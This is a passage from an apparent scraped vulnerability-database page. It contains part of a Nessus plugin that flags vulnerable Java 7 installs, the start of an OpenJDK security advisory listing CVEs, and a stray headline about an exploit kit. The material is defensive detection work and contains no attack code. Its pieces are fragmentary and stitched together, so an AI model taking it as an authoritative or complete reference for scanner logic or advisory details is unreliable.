script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"SMB/Java/JRE/*\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report = \n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions) \n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else \n audit(AUDIT_INST_VER_NOT_VULN, \"Java\", installed_versions);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:40", "description": "java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also severe security issues :\n\n - Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interacti

Counter.php Redirecting to Sites Peddling Styx Exploit Kit

Description

Related